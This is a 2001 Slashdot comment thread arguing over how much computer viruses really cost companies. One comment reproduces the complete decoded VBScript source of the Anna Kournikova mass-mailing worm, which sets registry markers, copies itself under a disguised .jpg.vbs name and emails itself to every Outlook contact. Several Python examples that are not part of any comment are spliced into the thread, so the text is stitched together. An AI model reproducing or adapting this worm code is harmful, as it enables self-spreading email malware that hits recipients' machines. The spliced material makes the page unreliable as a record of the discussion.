    Interesting to note, however, that all these costs were incurred only on systems running MICROS~1 software... the more interesting question is "How does the cost of virii to Windows users compare to the cost of virii on non-windows users?"

    Should buffer-overflow (stack smashing) and root exploits be included in the costs analysis? If not, it seems like the costs to Linux users is zero...

  • I think the costs are higher than corporations are willing to admit. I don't know about viruses specifically, but in "Information Warfare" by Winn Schwartau (I think I spelled his last name correctly) he talks about the damage bugs in general do to business. If they admitted to the public that there were such problems, their stock integrity would drop drastically.
  • Total damage caused by virus: 1 million dollars
    Total money spent on people to assess cost of virus damage: 16 million dollars.
  • by llywrch (9023) on Monday February 12, 2001 @02:37PM (#437242) Homepage Journal
    I happened to see the O'Reilly book on VB Script this weekend, & was amazed to see their choice for the animal on the cover . . .

    A flu virus?

    The colophon claims this is a drawing of a Sea Urchin. I'm not convinced.

    Geoff
  • by MosesJones (55544) on Monday February 12, 2001 @11:31AM (#437243) Homepage
    What complete tosh.

    Let's imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So that's the cost before you even talk about time.

    Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average person's time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.

    Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".

    I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.
  • by SnakeStu (60546) on Monday February 12, 2001 @11:30AM (#437244) Homepage
    This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

    No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.

    So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

    That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.

    Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

    That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!

    Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.

    There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in its duration. It's a minuscule blip, made slightly larger by being all at once.

    I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.

    And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

    At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.

    Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?

  • by technos (73414) on Monday February 12, 2001 @11:14AM (#437245) Homepage Journal
    We've got a few thousand users in fifteen countries. If all infections were like today's spat of VBS/SST.Worm, it'd cost us more money to find the yearly cost than the cost itself.

    But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners runs five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.

    Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.

    Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someone's ass.
  • by rkent (73434) <rkent@noSPAM.post.harvard.edu> on Monday February 12, 2001 @11:15AM (#437246)
    Well, I haven't conducted a thorough study throughout the organization, but we *just* got hit by the Anna Kournikova virus, and here's about what happened:
    • I saw 10 messages with the same subject arrive from 10 different people, and said "hmm, a virus, I think I'll delete them."
    • A bunch of other people noticed the same thing, and started yelling over the cubes, "Hey, there's a virus going around, delete it and don't open it!"
    • Everyone did.

    So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!

    But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's harddrive.

  • by |deity| (102693) on Monday February 12, 2001 @05:41PM (#437247) Homepage
    ... poor software. I think windows should say on the box "insecure by default". Any network program that is designed for end users and not computer geeks should have safety built in. I can see a flaw slipping by the programmers that would allow a worm or security breach. I can't imagine selling a product that is so insecure that anyone with a little experience can sit down and write a worm/virus/script to exploit, then never admit that the product was flawed.

    Maybe these companies should be able to sue Microsoft, for lost time and money.
  • by swordgeek (112599) on Monday February 12, 2001 @12:20PM (#437248) Journal
    Here's an example.

    Small company of 100 people, open 250 days/year.
    Annual GROSS income $5 million.
    $5m/250days/8hours = $2500/hr.

    Virus comes in, hits 24 people.
    Sysadmin can fix a machine in 15 minutes, making for six hours of work. That's $15000 in lost revenue!!! Then add on the salary for the sysadmin and the staff when they're not working, and you've got 12hr at $50/hr (average salary, including the CEO, who makes $2million in stock options), or another $600. Wow, almost $16k for a small company!!! (interesting aside: $16000/24 people comes to $666/person :-> )

    Now, let's look at this rationally. The sysadmin (a) can probably do several machines simultaneously, and (b) is already getting paid for this sort of thing. It's his job! Then there's the staff, who for their 15 minutes of downtime might take their allotted coffee break, or maybe even do some (gasp!) paperwork!

    For non-destructive viruses, I would guess the average cost to be about $5/seat infected. A far cry from the $666/seat calculated above. Here are some of the flaws that lead to this discrepancy:

    1) All work time is computer time for all staff infected.
    2) Time spent repairing the damage is outside of normal duties for the admin.
    3) All staff work at 100% efficiency all of the time.
    4) Time spent repairing the damage can't be done when the staff aren't around.

    In other words, the numbers quoted are nothing more than so much bullshit.

  • by zootie (190797) on Monday February 12, 2001 @11:42AM (#437249)
    You figured it out. It adds the registry entry to know if the system has been infected before, then e-mails itself to everybody in your address list. If it is Jan 26th, it opens that web page. Yes, it's weird that it tries to open that web page in the past, but who knows (maybe the author released it in the wild back then, and only now hit corporate servers).

    McAfee seems to detect it (I'm not sure if by heuristics or if it has the signature), but Norton AntiVirus doesn't detect it...

    What's interesting is how it decodes itself from the string. I kind of remember a couple VBS virus doing that earlier.

    It could be much worse. Many of these script viruses could be enhanced so the vbs extension doesn't show, and to use variable encoding keys, which would make it harder to create signatures.
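The double-extension disguise discussed in this thread (the attachment name `AnnaKournikova.jpg.vbs` appears in the code posted further down) is something a mail gateway can check for without any virus signature. The sketch below is an added example, not part of any comment or of any vendor's product; the extension lists, the verdict labels and the sample message are constructed assumptions.

```python
"""Mail-gateway check: flag attachments whose last extension is a script type."""
import email
from email import policy
from email.message import EmailMessage

# Assumption: file types Windows will execute on double-click.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta",
               ".bat", ".cmd", ".scr", ".pif", ".exe", ".com"}
# Assumption: harmless-looking types used as the visible "decoy" extension.
DECOY_EXTS = {".jpg", ".jpeg", ".gif", ".png", ".txt", ".doc", ".pdf", ".mp3"}


def classify_filename(name):
    """Return 'allow', 'block-script' or 'block-script-disguised'."""
    # Keep only the base name, whichever path separator the sender used.
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    # Windows ignores trailing dots and spaces, so strip them before judging.
    base = base.strip().rstrip(". ").lower()
    # Padding such as "x.jpg      .vbs" pushes the real extension out of view.
    pieces = [p.strip() for p in base.split(".")]
    if len(pieces) < 2:
        return "allow"
    final = "." + pieces[-1]
    inner = {"." + p for p in pieces[1:-1]}
    if final not in SCRIPT_EXTS:
        return "allow"
    return "block-script-disguised" if inner & DECOY_EXTS else "block-script"


def scan_message(raw_bytes):
    """Parse one RFC 5322 message and return [(filename, verdict), ...]."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""   # unnamed parts are judged as ""
        results.append((filename, classify_filename(filename)))
    return results


def build_sample():
    """Constructed sample message; the attachment bodies are inert placeholders."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "recipient@example.com"
    msg["Subject"] = "Here you have, ;o)"
    msg.set_content("Hi:\nCheck This!\n")
    for name in ("AnnaKournikova.jpg.vbs", "notes.txt", "report.vbs"):
        msg.add_attachment(b"inert placeholder bytes", maintype="application",
                           subtype="octet-stream", filename=name)
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, verdict in scan_message(build_sample()):
        print(f"{verdict:24} {filename}")
```

Because the decision rests on the file name alone, it still holds when the script body is re-encoded with a different key, which is the case the comment above says defeats signatures.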
  • by micromoog (206608) on Monday February 12, 2001 @11:53AM (#437250)
    This isn't caused by virus myths per se, it's caused by lack of user education.

    Any time you have an incident like this, go see the user personally with a pair of handcuffs and a 2x4. Gradually, as users become more enlightened about IS policy, you will see a decrease in these types of messages.

  • by update() (217397) on Monday February 12, 2001 @11:18AM (#437251) Homepage
    Hmm...what you're saying is that viruses shouldn't cost you anything because full backups should be instantly available. That's true, but the fact is that they aren't. For one thing, when a virus spreads during the day (which it will) that day's work is lost as you go back to the previous night's backup, or the one before that, to be on the safe side. And that's the best case scenario -- I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.

    Hey, street crime wouldn't cost anything if people all stayed inside.

  • by clinko (232501) on Monday February 12, 2001 @10:57AM (#437252) Homepage Journal
    This Is pretty funny and related to the topic. It's a map of where virus'? viri? whatever... attack...
    Basically A map of stupidity...
    Is Your State Stupid? [mcafee.com]

  • by omega_rob (246153) on Monday February 12, 2001 @11:02AM (#437253)
    I don't think I've personally lost much in the way of time or effort as a result of a virus, although I've seen my employer get burned a few times (notably with the "I Love You" bug).

    Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha! this attachment is really a VB script!") He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.

    I bet you all have this same guy working in your office. Admit it, it's probably you.

    omega_rob -- friend of the bonsai kitten

  • by Ben Schumin (312122) on Monday February 12, 2001 @11:06AM (#437254)
    If you don't understand how this could cost money, you've obviously never worked in a large corporate environment. An example, a company I worked at got an email vbs "virus" recently. Let's count out where the money comes from.
    • Thousands of users receive thousands of messages in their email box.
    • MIS has to go to 'infected' machines and clean each of them.
    • MIS has less time to address other important issues, blocking other people from completing tasks.
    • While MIS is fixing a machine, that user is less productive, if not completely unproductive.
    • Some users have unbacked up important data on their machines. This data can be destroyed. If someone worked on a project for two days, you're talking 16 hours of paid work lost completely. Multiply this across the entire organization.
    • Prevention costs: Site licenses or per user licenses for virus scanning solutions are expensive and rarely catch new vbs viruses.
    • Small businesses are also hit hard, because often there is no one at the location who has a clue what to do about the problem, so they have to hire some overpriced consultant to run a virus scan and clean their machines for them.

    It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.

  • by Anonymous Coward on Monday February 12, 2001 @11:10AM (#437255)
    I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.

    Therefore things like software piracy, virus attacks, are not losses.

    Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accountants don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and they claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.

    If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.

  • ...is zero.

    The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.

    This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

    So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

    Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

    There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in its duration. It's a minuscule blip, made slightly larger by being all at once.

    Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

  • Is that getting accurate figures, at least from anti-virus companies/agencies, is going to be difficult. After all, the more serious they play out the problem to be, the more people are going to buy their products.

    Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected" [vmyths.com], which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saying that only 10,000 machines had been hit.

    </rant>

    --

  • by Ralph Wiggam (22354) on Monday February 12, 2001 @11:19AM (#437258) Homepage
    A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone on emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped us that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.

    -B
  • by Tower (37395) on Monday February 12, 2001 @11:29AM (#437259)
    Further proof that nobody in North Dakota owns a computer... and if they did, they would still need phone lines to connect and get a virus.
    --
  • by Ungrounded Lightning (62228) on Monday February 12, 2001 @12:47PM (#437260) Journal
    Viruses are probably even MORE costly. Consider:

    - A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
    - The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.

    and so on.

    Let's suppose it's a high-tek company on the rise. And let's suppose this delays its product introduction by one day.

    Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.

    Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.

    Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.

    (If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)

    Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.

    Computing the PROVABLE direct loss is another story entirely.
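The two-graph procedure in the comment above (shift and lower the revenue curve, take the difference, then fund it from an interest-bearing account, as the earlier "bank account" reply also describes) can be carried through numerically. This is an added example, not the commenter's code; the revenue ramp, the retained-share factor and the daily interest rate are constructed assumptions.

```python
"""Present-value cost of a launch delay, following the two-graph procedure."""


def hit_stream(baseline, delay_days, retained_share):
    """Revenue with the virus hit: shifted right, then lowered.

    Both futures end on the same day (when the un-hit company folds),
    so the shifted curve is truncated to the baseline's length.
    """
    shifted = ([0.0] * delay_days + list(baseline))[:len(baseline)]
    return [x * retained_share for x in shifted]


def shortfall(baseline, delay_days, retained_share):
    """Daily gap between the two graphs; a negative entry is a deposit."""
    hit = hit_stream(baseline, delay_days, retained_share)
    return [b - h for b, h in zip(baseline, hit)]


def present_value(flows, daily_rate):
    """Deposit needed on day 0 to pay flows[d] on day d at the given rate."""
    return sum(f / (1.0 + daily_rate) ** day for day, f in enumerate(flows))


def final_balance(deposit, flows, daily_rate):
    """Run the account forward: accrue interest overnight, withdraw each day."""
    balance = deposit
    for day, f in enumerate(flows):
        if day > 0:
            balance *= 1.0 + daily_rate
        balance -= f
    return balance


def virus_cost(baseline, delay_days, retained_share, daily_rate):
    """Cost of the hit in current dollars, per the procedure in the comment."""
    return present_value(shortfall(baseline, delay_days, retained_share),
                         daily_rate)


def sample_baseline(days=730, start=1000.0, growth=25.0):
    """Constructed revenue ramp for a growing company (dollars per day)."""
    return [start + growth * d for d in range(days)]


if __name__ == "__main__":
    base = sample_baseline()
    rate = 0.0002            # assumed daily interest rate
    share = 0.95             # assumed: 5% of sales lost to the competition
    flows = shortfall(base, 1, share)
    cost = virus_cost(base, 1, share, rate)
    print(f"one day of revenue at launch: {base[0]:12.2f}")
    print(f"present-value cost of delay:  {cost:12.2f}")
    print(f"account balance at the end:   {final_balance(cost, flows, rate):12.6f}")
```

With these made-up inputs the result is dominated by the retained-share assumption rather than by the one-day shift, which illustrates the comment's point that the number depends on predicting two futures.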
  • by donutello (88309) on Monday February 12, 2001 @01:33PM (#437261) Homepage
    Virus myths: Ahh the good old days when the Good Times [doe.gov] virus was clearly a hoax - unless you believed it in which case you would forward it around, fulfilling the prophecy!
  • by zootie (190797) on Monday February 12, 2001 @11:06AM (#437262)
    I don't have costs on viruses out there. I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string.

    <BLOCKQUOTE>
    'Vbs.OnTheFly Created By OnTheFly
    On Error Resume Next
    Set E7O3tH65p4P = CreateObject("WScript.Shell")
    E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
    Set rOwamTjngb5= Createobject("scripting.filesystemobject")
    rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolde r(0)& "\AnnaKournikova.jpg.vbs"
    if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
    e2nSA7HlgLC()
    end if
    if month(now) =1 and day(now) =26 then
    E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
    end if
    Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
    ZN5JKZ4xiuV= JKgSwHK773x.readall
    JKgSwHK773x.Close
    Do
    If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
    Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
    UeI22z8P4v0.writeZN5JKZ4xiuV
    UeI22z8P4v0.Close
    End If
    Loop
    Function e2nSA7HlgLC()
    On Error Resume Next
    Set D23OvxM6KRH = CreateObject("Outlook.Application")
    If D23OvxM6KRH= "Outlook"Then
    Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
    Set S6k211ge33L= j25tNZB9f8l.AddressLists
    For Each JR2mPsM2BmR In S6k211ge33L
    If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
    d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
    For X789Va3zRez= 1 To d4BD3xgwv1J
    Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
    Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
    iq72b483v3Z.To = OIE4BVYjOJ8.Address
    iq72b483v3Z.Subject = "Here you have, ;o)"
    iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
    set fWsnq8YG9f1=iq72b483v3Z.Attachments
    fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
    iq72b483v3Z.DeleteAfterSubmit = True
    If iq72b483v3Z.To <> "" Then
    iq72b483v3Z.Send
    E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
    End If
    Next
    End If
    Next
    end if
    End Function
    'Vbswg 1.50b
    </BLOCKQUOTE>
  • by NetJunkie (56134) <jason@nash.gmail@com> on Monday February 12, 2001 @11:07AM (#437263)
    It can cost a lot when a business gets hit hard by a virus..but it shouldn't.

    Take today for example..that big new scary .vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to do..works damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.

    As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.

    If you're not blocking .vbs files TODAY, you need to be asking why not.
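
A sketch of the gateway-side attachment block the comment above describes, as an added example that is not the poster's actual configuration. It goes beyond .vbs to other Windows Script Host extensions and flags the double-extension disguise seen in the `AnnaKournikova.jpg.vbs` filename; both extension lists, the function names and the sample messages are assumptions constructed for illustration.

```python
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Assumed block list: extensions Windows Script Host will execute.
BLOCKED = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
# Assumed decoy list: harmless-looking extensions placed before the real one.
DECOYS = {".jpg", ".gif", ".txt", ".doc", ".pdf"}


def blocked_attachments(raw: bytes):
    """Return (filename, reason) for every attachment the gateway should drop."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    hits = []
    for part in msg.walk():
        name = part.get_filename()
        if not name:
            continue
        # Windows drops trailing dots and spaces, so "x.vbs." still runs as .vbs.
        clean = name.rstrip(". ").lower()
        stem, dot, last = clean.rpartition(".")
        if dot + last not in BLOCKED:
            continue
        inner = "." + stem.rpartition(".")[2] if "." in stem else ""
        hits.append((name, "double-extension" if inner in DECOYS else "script"))
    return hits


def sample(filename: str) -> bytes:
    """Constructed test message; the attachment body is an inert placeholder."""
    m = EmailMessage()
    m["To"] = "user@example.com"
    m["Subject"] = "Here you have, ;o)"
    m.set_content("Hi:\nCheck This!\n")
    m.add_attachment(b"placeholder, not script code\n", maintype="application",
                     subtype="octet-stream", filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    for fn in ("AnnaKournikova.jpg.vbs", "notes.VBS.", "photo.jpg"):
        print(fn, "->", blocked_attachments(sample(fn)) or "deliver")
```

Matching on the final extension after normalising case and trailing dots is what makes the block hold against renamed copies; the decoy check only adds a more specific reason to the log entry.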
  • by SpanishInquisition (127269) on Monday February 12, 2001 @11:01AM (#437264) Homepage Journal
    Windows ME sells for 169.99 at Amazon.com
  • by tenzig_112 (213387) on Monday February 12, 2001 @11:00AM (#437265) Homepage
    That's the real question.

    As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.

    argh! [ridiculopathy.com]
